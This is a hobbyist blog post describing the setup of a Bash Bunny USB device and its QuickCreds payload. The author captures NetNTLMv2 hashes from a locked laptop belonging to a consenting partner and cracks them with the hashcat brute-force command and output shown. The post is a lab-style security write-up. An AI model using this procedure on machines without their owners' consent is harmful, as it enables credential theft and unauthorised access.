Bash Bunny QuickCreds – Grab Creds from Locked Machines

I figured that the Bash Bunny QuickCreds module would be a great way to test out my new toy.

Introduction

I got a Bash Bunny with the Silicon Valley discount code, and was looking forward to playing with it.

First of all, for those unfamiliar with the attack (or title), then I highly recommend mubix’s original post.

Configuration

First, I needed to get the payload loaded onto the device and working properly.

I had a ton of issues sharing internet with my Windows machine, so I decided to try a different one.

Additionally, I was also having trouble sharing internet using my Mac.

In the end, I was able to get it working after following the above instructions on my Kali VM. For more information, see the above thread.

1. With you [sic] vm turned off and the bunny unplugged, go to Settings > Ports > USB and enable usb 3.0
2. Switch the bunny to state 1; plug it in and wait for it to load completely
3. Add a usb filter (plus icon) and add the device (mine says “Linux 3.4.39 with sunxi_usb_udc RNDIS/Ethernet Gadget [0333]”)
4. Eject the bunny
5. Flip the switch to states 2 & 3 and repeat steps 2-4
6. Turn on your vm and keep the bunny unplugged
7. wget the bb.sh script in the vm
8. Run `sudo bash bb.sh` and follow the guided setup
9. With the bunny NOT in arm mode (position 3) plug the bunny in after the third step/question
10. If you did it right, the script will “detect” the bunny at this stage
11. The last step is to press “C” once you see the main menu again to “connect” using the settings you just set up
12. You should now be able to ssh in and test the connection with ping

DNS Issues

Once I followed the configuration steps, I was able to SSH into my bunny.

Unfortunately, I was unable to properly download anything or update it.

After a few minutes of frustration, I took a look at resolv.conf on the device.

root@bunny:~# ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=43 time=26.7 ms
^C
--- 8.8.8.8 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 26.766/26.766/26.766/0.000 ms
root@bunny:~# ping google.com
^C
root@bunny:~# cat /etc/resolv.conf
# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
#     DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
nameserver 8.8.8.8
nameserver 8.8.4.4

While normally this would not be an issue, I have my pfSense configured to block all outgoing DNS requests. In this case, I just disabled the firewall rule for a little since it made life easier.

Tools Installation

Before the Bash Bunny QuickCreds payload would work, I would need Responder on the device as well.

First, I added the ToolsInstaller package into the switch1 payload.

Next, I also added the QuickCreds payload into switch2 while I was at it.

Unfortunately, the installation kept failing for ToolsInstaller.

Next, I tried to manually create the pentest folder.

Once I did that, I manually uploaded impacket and responder to the device.

Unfortunately, I was still getting constant failures with the installation.

Firmware Update

At this point, I realized that it was probably time to update my firmware.

Going to the download page, I noticed that 1.3 was the newest version.

I followed the instructions, and properly updated the firmware on my device.

Bash Bunny QuickCreds – Tool Success!

Next, I moved Responder to the new proper location, /tools/responder.

At this point, I thought I would be good to go, so I attempted the quickcreds attack.

Unfortunately, the bunny still had an amber light, and I believed that it was Responder’s fault.

Finally, I found the .deb files, and was able to install Responder successfully!

Bash Bunny QuickCreds – Execution

With everything working, I asked Hacker’s Girlfriend if she would be my guinea pig.

First, I verified that she locked and password protected her laptop.

Next, I plugged in the bunny and watched it switch to the amber light.

Finally, after only a few seconds, it switched to a green light indicating success!

After checking the device, there was a file with NetNTLMv2 hashes this time.

Hash Cracking

Based on a small hint from the girlfriend, it was time to crack the hashes. Unfortunately, I had to quit hashcat in the middle, so I’m not sure exactly how long the process took.

Rays-MacBook-Pro:testing doyler$ hashcat -a 3 -m 5600 -i --increment-min=1 --increment-max=10 hash.txt ?l?l?l?l?l?l?l?l?l?l 
hashcat () starting...

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Hashes: 2 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
* Brute-Force

Watchdog: Temperature abort trigger disabled.
Watchdog: Temperature retain trigger disabled.

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.           

Session..........: hashcat                                
Status...........: Exhausted
Hash.Type........: NetNTLMv2
Hash.Target......: GIRLFRIEND::Girlfriend-THINK:dexxxxx...000000
Time.Started.....: Fri Jul 14 19:40:47 2017 (0 secs)
Time.Estimated...: Fri Jul 14 19:40:47 2017 (0 secs)
Guess.Mask.......: ?l [1]
Guess.Queue......: 1/10 (10.00%)
Speed.Dev.#2.....:        0 H/s (0.45ms)
Speed.Dev.#3.....:        0 H/s (0.00ms)
Speed.Dev.#*.....:        0 H/s
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 26/26 (100.00%)
Rejected.........: 0/26 (0.00%)
Restore.Point....: 0/1 (0.00%)
Candidates.#2....: q -> x
Candidates.#3....: [Generating]



Session..........: hashcat
Status...........: Running
Hash.Type........: NetNTLMv2
Hash.Target......: GIRLFRIEND::Girlfriend-THINK:dexxxxx...000000
Time.Started.....: Wed Jul 19 12:28:22 2017 (1 sec)
Time.Estimated...: Wed Jul 19 12:28:26 2017 (3 secs)
Guess.Mask.......: ?l?l?l?l?l?l?l?l?l?l [10]
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....: 12865.7 kH/s (4.11ms)
Speed.Dev.#3.....: 60526.9 kH/s (7.08ms)
Speed.Dev.#*.....: 73392.6 kH/s
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: xxxxxxxx/308915776 (xx%)
Rejected.........: 0/88440832 (0.00%)
Restore.Point....: xxxxxxxx/308915776 (xx%)
Candidates.#2....: xxxxxxxxxx -> xxxxxxxxxx
Candidates.#3....: xxxxxxxxxx -> xxxxxxxxxx

GIRLFRIEND::Girlfriend-THINK:dexxxxx:xxxxx:xxxxx:(password here)

Bash Bunny QuickCreds – Conclusion

After cracking the password, I attempted to use it on her laptop, and it worked!

This was an awesome first payload to use on my bunny, and probably one that I will keep on permanently.

Let me know if you have any ideas or suggestions for other payloads to try or write.